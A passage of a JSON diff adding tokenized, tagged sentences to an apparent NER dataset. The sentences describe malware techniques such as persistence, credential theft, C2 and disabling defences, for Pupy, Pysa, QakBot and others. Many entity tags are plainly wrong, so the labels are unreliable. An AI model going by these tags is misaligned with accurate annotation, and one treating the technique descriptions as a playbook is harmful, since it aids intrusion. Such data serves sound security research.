"scanning." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O" + ] + }, + { + "tokens": [ + "Pupy", + "can", + "list", + "local", + "and", + "remote", + "shared", + "drives", + "and", + "folders", + "over", + "SMB." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Pupy", + "can", + "also", + "perform", + "pass-the-ticket." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pupy", + "has", + "a", + "module", + "for", + "loading", + "and", + "executing", + "PowerShell", + "scripts." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "B-HackOrg", + "B-Features" + ] + }, + { + "tokens": [ + "Pupy", + "can", + "list", + "the", + "running", + "processes", + "and", + "get", + "the", + "process", + "ID", + "and", + "parent", + "process’s", + "ID." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pupy", + "can", + "use", + "an", + "add", + "on", + "feature", + "when", + "creating", + "payloads", + "that", + "allows", + "you", + "to", + "create", + "custom", + "Python", + "scripts", + "(“scriptlets”)", + "to", + "perform", + "tasks", + "offline", + "(without", + "requiring", + "a", + "session)", + "such", + "as", + "sandbox", + "detection,", + "adding", + "persistence,", + "etc." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "O" + ] + }, + { + "tokens": [ + "Pupy", + "adds", + "itself", + "to", + "the", + "startup", + "folder", + "or", + "adds", + "itself", + "to", + "the", + "Registry", + "key", + "<code>SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run</code>", + "for", + "persistence." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Pupy", + "can", + "enable/disable", + "RDP", + "connection", + "and", + "can", + "start", + "a", + "remote", + "desktop", + "session", + "using", + "a", + "browser", + "web", + "socket", + "client." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "B-Way", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pupy", + "can", + "drop", + "a", + "mouse-logger", + "that", + "will", + "take", + "small", + "screenshots", + "around", + "at", + "each", + "click", + "and", + "then", + "send", + "back", + "to", + "the", + "server." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "O", + "B-Way", + "O", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pupy", + "uses", + "PsExec", + "to", + "execute", + "a", + "payload", + "or", + "commands", + "on", + "a", + "remote", + "host." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pupy", + "has", + "a", + "module", + "that", + "checks", + "a", + "number", + "of", + "indicators", + "on", + "the", + "system", + "to", + "determine", + "if", + "its", + "running", + "on", + "a", + "virtual", + "machine." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pupy", + "can", + "grab", + "a", + "system’s", + "information", + "including", + "the", + "OS", + "version,", + "architecture,", + "etc." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pupy", + "has", + "built", + "in", + "commands", + "to", + "identify", + "a", + "host’s", + "IP", + "address", + "and", + "find", + "out", + "other", + "network", + "configuration", + "settings", + "by", + "viewing", + "connected", + "sessions." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pupy", + "has", + "a", + "built-in", + "utility", + "command", + "for", + "<code>netstat</code>,", + "can", + "do", + "net", + "session", + "through", + "PowerView,", + "and", + "has", + "an", + "interactive", + "shell", + "which", + "can", + "be", + "used", + "to", + "discover", + "additional", + "information." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Pupy", + "can", + "enumerate", + "local", + "information", + "for", + "Linux", + "hosts", + "and", + "find", + "currently", + "logged", + "on", + "users", + "for", + "Windows", + "hosts." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pupy", + "can", + "be", + "used", + "to", + "establish", + "persistence", + "using", + "a", + "systemd", + "service." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Pupy", + "can", + "obtain", + "a", + "list", + "of", + "SIDs", + "and", + "provide", + "the", + "option", + "for", + "selecting", + "process", + "tokens", + "to", + "impersonate." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O" + ] + }, + { + "tokens": [ + "Pupy", + "can", + "access", + "a", + "connected", + "webcam", + "and", + "capture", + "pictures." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Pupy", + "can", + "communicate", + "over", + "HTTP", + "for", + "C2." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Pupy", + "can", + "use", + "an", + "XDG", + "Autostart", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PyDCrypt", + "has", + "decrypted", + "and", + "dropped", + "the", + "DCSrv", + "payload", + "to", + "disk." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PyDCrypt", + "has", + "modified", + "firewall", + "rules", + "to", + "allow", + "incoming", + "SMB,", + "NetBIOS,", + "and", + "RPC", + "connections", + "using", + "`netsh.exe`", + "on", + "remote", + "machines." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "B-Way", + "O", + "O", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PyDCrypt", + "has", + "been", + "compiled", + "and", + "encrypted", + "with", + "PyInstaller,", + "specifically", + "using", + "the", + "--key", + "flag", + "during", + "the", + "build", + "phase." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PyDCrypt", + "will", + "remove", + "all", + "created", + "artifacts", + "such", + "as", + "dropped", + "executables." + ], + "ner_tags": [ + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "PyDCrypt", + "has", + "dropped", + "DCSrv", + "under", + "the", + "`svchost.exe`", + "name", + "to", + "disk." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PyDCrypt", + "has", + "attempted", + "to", + "execute", + "with", + "PowerShell." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "PyDCrypt,", + "along", + "with", + "its", + "functions,", + "is", + "written", + "in", + "Python." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PyDCrypt", + "has", + "used", + "netsh", + "to", + "find", + "RPC", + "connections", + "on", + "remote", + "machines." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Tool", + "O", + "I-Features", + "B-Purp", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PyDCrypt", + "has", + "probed", + "victim", + "machines", + "with", + "<code>whoami</code>", + "and", + "has", + "collected", + "the", + "username", + "from", + "the", + "machine." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PyDCrypt", + "has", + "used", + "`cmd.exe`", + "for", + "execution." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "PyDCrypt", + "has", + "attempted", + "to", + "execute", + "with", + "WMIC." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus" + ] + }, + { + "tokens": [ + "Pysa", + "has", + "used", + "brute", + "force", + "attempts", + "against", + "a", + "central", + "management", + "console,", + "as", + "well", + "as", + "some", + "Active", + "Directory", + "accounts." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pysa", + "has", + "extracted", + "credentials", + "from", + "the", + "password", + "database", + "before", + "encrypting", + "the", + "files." + ], + "ner_tags": [ + "B-Time", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pysa", + "has", + "used", + "RSA", + "and", + "AES-CBC", + "encryption", + "algorithm", + "to", + "encrypt", + "a", + "list", + "of", + "targeted", + "file", + "extensions." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "B-Way", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "B-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pysa", + "has", + "the", + "capability", + "to", + "stop", + "antivirus", + "services", + "and", + "disable", + "Windows", + "Defender." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "B-Features", + "O", + "O", + "O", + "B-SecTeam" + ] + }, + { + "tokens": [ + "Pysa", + "has", + "deleted", + "batch", + "files", + "after", + "execution." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "B-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "Pysa", + "has", + "the", + "functionality", + "to", + "delete", + "shadow", + "copies." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Pysa", + "can", + "perform", + "OS", + "credential", + "dumping", + "using", + "Mimikatz." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Pysa", + "has", + "executed", + "a", + "malicious", + "executable", + "by", + "naming", + "it", + "svchost.exe." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Pysa", + "has", + "modified", + "the", + "registry", + "key", + "“SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System”", + "and", + "added", + "the", + "ransom", + "note." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pysa", + "can", + "perform", + "network", + "reconnaissance", + "using", + "the", + "Advanced", + "Port", + "Scanner", + "tool." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "Pysa", + "has", + "used", + "Powershell", + "scripts", + "to", + "deploy", + "its", + "ransomware." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pysa", + "has", + "used", + "Python", + "scripts", + "to", + "deploy", + "ransomware." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Org" + ] + }, + { + "tokens": [ + "Pysa", + "has", + "laterally", + "moved", + "using", + "RDP", + "connections." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Pysa", + "has", + "used", + "PsExec", + "to", + "copy", + "and", + "execute", + "the", + "ransomware." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pysa", + "can", + "stop", + "services", + "and", + "processes." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Pysa", + "can", + "perform", + "network", + "reconnaissance", + "using", + "the", + "Advanced", + "IP", + "Scanner", + "tool." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "QUADAGENT", + "was", + "likely", + "obfuscated", + "using", + "`Invoke-Obfuscation`." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "QUADAGENT", + "uses", + "DNS", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QUADAGENT", + "uses", + "AES", + "and", + "a", + "preshared", + "key", + "to", + "decrypt", + "the", + "custom", + "Base64", + "routine", + "used", + "to", + "encode", + "strings", + "and", + "scripts." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QUADAGENT", + "uses", + "multiple", + "protocols", + "(HTTPS,", + "HTTP,", + "DNS)", + "for", + "its", + "C2", + "server", + "as", + "fallback", + "channels", + "if", + "communication", + "with", + "one", + "is", + "unsuccessful." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Way", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QUADAGENT", + "has", + "a", + "command", + "to", + "delete", + "its", + "Registry", + "key", + "and", + "scheduled", + "task." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QUADAGENT", + "stores", + "a", + "session", + "identifier", + "unique", + "to", + "the", + "compromised", + "system", + "as", + "well", + "as", + "a", + "pre-shared", + "key", + "used", + "for", + "encrypting", + "and", + "decrypting", + "C2", + "communications", + "within", + "a", + "Registry", + "key", + "(such", + "as", + "`HKCU\\Office365DCOMCheck`)", + "in", + "the", + "`HKCU`", + "hive." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QUADAGENT", + "used", + "the", + "PowerShell", + "filenames", + "<code>Office365DCOMCheck.ps1</code>", + "and", + "<code>SystemDiskClean.ps1</code>." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QUADAGENT", + "modifies", + "an", + "HKCU", + "Registry", + "key", + "to", + "store", + "a", + "session", + "identifier", + "unique", + "to", + "the", + "compromised", + "system", + "as", + "well", + "as", + "a", + "pre-shared", + "key", + "used", + "for", + "encrypting", + "and", + "decrypting", + "C2", + "communications." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QUADAGENT", + "uses", + "PowerShell", + "scripts", + "for", + "execution." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "B-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "QUADAGENT", + "checks", + "if", + "a", + "value", + "exists", + "within", + "a", + "Registry", + "key", + "in", + "the", + "HKCU", + "hive", + "whose", + "name", + "is", + "the", + "same", + "as", + "the", + "scheduled", + "task", + "it", + "has", + "created." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QUADAGENT", + "creates", + "a", + "scheduled", + "task", + "to", + "maintain", + "persistence", + "on", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Purp", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QUADAGENT", + "encodes", + "C2", + "communications", + "with", + "base64." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QUADAGENT", + "gathers", + "the", + "current", + "domain", + "the", + "victim", + "system", + "belongs", + "to." + ], + "ner_tags": [ + "B-Way", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QUADAGENT", + "gathers", + "the", + "victim", + "username." + ], + "ner_tags": [ + "B-Way", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QUADAGENT", + "uses", + "VBScripts." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "QUADAGENT", + "uses", + "HTTPS", + "and", + "HTTP", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QUADAGENT", + "uses", + "cmd.exe", + "to", + "execute", + "scripts", + "and", + "commands", + "on", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QUIETCANARY", + "has", + "the", + "ability", + "to", + "stage", + "data", + "prior", + "to", + "exfiltration." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QUIETCANARY", + "can", + "use", + "a", + "custom", + "parsing", + "routine", + "to", + "decode", + "the", + "command", + "codes", + "and", + "additional", + "parameters", + "from", + "the", + "C2", + "before", + "executing", + "them." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QUIETCANARY", + "can", + "execute", + "processes", + "in", + "a", + "hidden", + "window." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QUIETCANARY", + "can", + "call", + "`System.Net.HttpWebRequest`", + "to", + "identify", + "the", + "default", + "proxy", + "configured", + "on", + "the", + "victim", + "computer." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QUIETCANARY", + "has", + "the", + "ability", + "to", + "retrieve", + "information", + "from", + "the", + "Registry." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QUIETCANARY", + "can", + "base64", + "encode", + "C2", + "communications." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Idus" + ] + }, + { + "tokens": [ + "QUIETCANARY", + "can", + "RC4", + "encrypt", + "C2", + "communications." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QUIETCANARY", + "can", + "identify", + "the", + "default", + "proxy", + "setting", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QUIETCANARY", + "can", + "use", + "HTTPS", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QUIETEXIT", + "can", + "use", + "an", + "inverse", + "negotiated", + "SSH", + "connection", + "as", + "part", + "of", + "its", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "I-Way", + "I-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QUIETEXIT", + "can", + "proxy", + "traffic", + "via", + "SOCKS." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Features", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "QUIETEXIT", + "can", + "attempt", + "to", + "connect", + "to", + "a", + "second", + "hard-coded", + "C2", + "if", + "the", + "first", + "hard-coded", + "C2", + "address", + "fails." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QUIETEXIT", + "has", + "attempted", + "to", + "change", + "its", + "name", + "to", + "`cron`", + "upon", + "startup.", + "During", + "incident", + "response,", + "QUIETEXIT", + "samples", + "have", + "been", + "identified", + "that", + "were", + "renamed", + "to", + "blend", + "in", + "with", + "other", + "legitimate", + "files." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QUIETEXIT", + "can", + "establish", + "a", + "TCP", + "connection", + "as", + "part", + "of", + "its", + "initial", + "connection", + "to", + "the", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QakBot", + "has", + "the", + "ability", + "to", + "enumerate", + "windows", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QakBot", + "can", + "use", + "large", + "file", + "sizes", + "to", + "evade", + "detection." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QakBot", + "can", + "use", + "advanced", + "web", + "injects", + "to", + "steal", + "web", + "banking", + "credentials." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "QakBot", + "can", + "conduct", + "brute", + "force", + "attacks", + "to", + "capture", + "credentials." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Org", + "I-OffAct", + "I-OffAct", + "O", + "B-Purp", + "O" + ] + }, + { + "tokens": [ + "QakBot", + "can", + "use", + "signed", + "loaders", + "to", + "evade", + "detection." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QakBot", + "can", + "use", + "obfuscated", + "and", + "encoded", + "scripts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Tool" + ] + }, + { + "tokens": [ + "QakBot", + "has", + "collected", + "usernames", + "and", + "passwords", + "from", + "Firefox", + "and", + "Chrome." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "QakBot", + "has", + "the", + "ability", + "to", + "use", + "DLL", + "side-loading", + "for", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QakBot", + "can", + "use", + "a", + "variety", + "of", + "commands,", + "including", + "esentutl.exe", + "to", + "steal", + "sensitive", + "data", + "from", + "Internet", + "Explorer", + "and", + "Microsoft", + "Edge,", + "to", + "acquire", + "information", + "that", + "is", + "subsequently", + "exfiltrated." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QakBot", + "can", + "deobfuscate", + "and", + "re-assemble", + "code", + "strings", + "for", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QakBot", + "has", + "the", + "ability", + "to", + "modify", + "the", + "Registry", + "to", + "add", + "its", + "binaries", + "to", + "the", + "Windows", + "Defender", + "exclusion", + "list." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QakBot", + "can", + "use", + "domain", + "generation", + "algorithms", + "in", + "C2", + "communication." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QakBot", + "can", + "run", + "<code>nltest", + "/domain_trusts", + "/all_trusts</code>", + "for", + "domain", + "trust", + "discovery." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QakBot", + "can", + "send", + "stolen", + "information", + "to", + "C2", + "nodes", + "including", + "passwords,", + "accounts,", + "and", + "emails." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "QakBot", + "can", + "move", + "laterally", + "using", + "worm-like", + "functionality", + "through", + "exploitation", + "of", + "SMB." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "QakBot", + "has", + "a", + "module", + "that", + "can", + "proxy", + "C2", + "communications." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QakBot", + "can", + "delete", + "folders", + "and", + "files", + "including", + "overwriting", + "its", + "executable", + "with", + "legitimate", + "programs." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "B-HackOrg", + "I-Features", + "I-Features", + "O", + "B-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QakBot", + "can", + "identify", + "whether", + "it", + "has", + "been", + "run", + "previously", + "on", + "a", + "host", + "by", + "checking", + "for", + "a", + "specified", + "folder." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QakBot", + "can", + "store", + "its", + "configuration", + "information", + "in", + "a", + "randomly", + "named", + "subkey", + "under", + "<code>HKCU\\Software\\Microsoft</code>." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "QakBot", 